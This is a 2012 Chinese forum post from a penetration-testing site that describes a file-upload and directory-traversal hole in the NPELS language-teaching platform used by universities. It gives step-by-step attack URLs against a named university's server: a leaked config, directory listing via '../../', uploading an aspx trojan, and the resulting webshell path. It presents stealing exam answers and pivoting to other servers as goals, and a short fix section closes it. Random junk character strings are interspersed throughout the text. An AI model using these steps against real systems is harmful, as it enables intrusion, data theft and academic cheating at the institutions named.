中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
# @* U7 r+ g6 {0 g
, ]- \+ J8 V9 X
详细说明:
" x* j# r, Y% v' X
* f& U0 x( \; L0 j+ C+ ~4 L9 b
以南开大学的为例:
6 p8 W% L9 L: {/ X* n: H# p! i& O
http://222.30.60.3/NPELS
5 Z" q' ^. V1 J) d
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
) M8 X. m7 d o8 E' Z# R( Z
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
j3 ?7 W" q( h8 U* p9 d. C: N
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
/ w5 y+ ]* E% T5 e4 q+ `( a8 e* g
</setting>
# h G: ^8 M$ R8 Y7 S: R j
及版本号
4 |: ~, c- S& c3 T
<add key="TVersion" value="1, 0, 0, 2187">
# {7 \0 Z9 s+ }8 a
</add>
. v, }) I- |( G: I, w( p+ y
直接访问
; {6 D9 g, D. r1 r
http://222.30.60.3/NPELS/CommonService.asmx
& C$ \! {) z3 X9 P+ Y. F
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
1 `& _5 Y4 l3 i8 G' m4 K% S: g
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
0 L. y/ r" S. d* V- o( I; J( B2 c
进一步列目录(返回的网页很大,可以直接 wget 下来)
) X+ {- F" ^, |* |( U* w& X7 V
http://222.30.60.3/NPELS/CommonS ... List?version=../../
# S+ y" S8 ^ D
3 p; o6 _- X7 \
发现
0 k) e4 Y; o8 z- ]) L
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
* \0 f1 L8 `& I, ]5 `
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
8 C" y, Q; m9 c+ |0 q# a
上传后继续列目录找到木马地址直接访问即可
+ [7 J' ~3 P; C8 V1 D
% w v4 y+ r" F5 q" O0 a7 F
OOXX
) I7 J b. b# S7 _$ D& v) Y
! W. O8 B+ P, w4 O B; f
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
' n6 _7 S4 d* r. ?+ H* E
漏洞证明:
j% B# A6 X4 M
+ z5 R. J- s; x# Y9 {; e& y; L
列目录:
3 k# u R3 _. X1 {
http://222.30.60.3/NPELS/CommonS ... List?version=../../
5 V8 x O1 e% T+ x% p* C4 J( _
文件上传:
, g. o( g' L/ A+ i' D
http://222.30.60.3/npelsv/editor/editor.htm
- Z- j8 j7 |9 |$ n
/ @' g. O: j0 ~- a8 t) l/ ~
上传木马:
5 ~" `0 Q# Y9 ~) x* l
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
' e/ w# {; v6 j$ G4 {1 G
" [( h4 n4 O) `8 L A7 N! T- N
修复方案:
/ V# d9 l5 D' m1 z: E# |8 r- O
好像考试系统必须使用 CommonService.asmx
: K, V; d1 |0 B" [ |
最好配置文件加密或者用别的方式不让它泄露出来
( `: g5 j1 H: P& p0 b
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
- P6 a( }# P T j4 m# C$ N/ k' A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2